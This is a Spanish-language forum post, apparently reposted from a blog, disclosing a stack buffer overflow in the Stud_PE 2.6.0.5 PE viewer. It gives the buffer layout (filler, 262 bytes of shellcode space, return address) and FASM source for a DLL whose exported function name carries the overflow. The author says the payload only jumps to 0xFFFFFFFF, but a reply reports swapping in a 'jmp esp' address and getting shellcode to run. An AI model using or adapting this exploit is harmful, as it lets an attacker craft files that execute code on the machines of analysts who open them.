Autor
En la version 2.6.0.5 y seguramente en algunas anteriores se encuentra un bug del tipo BOF , este ocurre en el listado de las funciones exportada al poner una funcion de nombre muy largo .
Este BUG podria permitir la ejecucion de un ShellCode , aunque el exploit que se publicara solamente causa un salto a 0xFFFFFFFF para evitar el uso malicioso por cualquier persona.
El buffer donde se explota el BOF es algo a si
4 bytes ( Poner cualquiera ) + 262 bytes ( Normalmente aqui iria un ShellCode) + 4 bytes[Direccion de retorno]
Código
Exploit equ 4 dup(0x90) ,262 dup (0x90) , 4 dup (0xFF) ;0xFFFFFFFF = jmp 0xFFFFFFFF
include "win32ax.inc"
entry ini
.data
ini:
proc start
stdcall dword[ExitProcess],0
endp
data import
ccbase = $400000
dd 0,0,0, kernel_name - ccbase , kernel_table - ccbase
dd 0,0,0,0,0
kernel_name: db "kernel32.dll",0
kernel_table:
ExitProcess: dd _ExitProcess - ccbase
dd 0
_ExitProcess: db 0,0,"ExitProcess",0
end data
section '.edata' export data readable
export 'ERRORMSG.DLL',start,Exploit
section '.reloc' fixups data discardable
Fuente: http://secmam.blogspot.com/2010/03/bug-bof-stud-pe-2605.html
PD: No lo coloco con la intencion de spam si no que para evitar cualquier cosa legal contra el foro
En línea
. Buscando un jmp esp en cualquier modulo que carga, la sc se me ejecutó sin problemas 
.
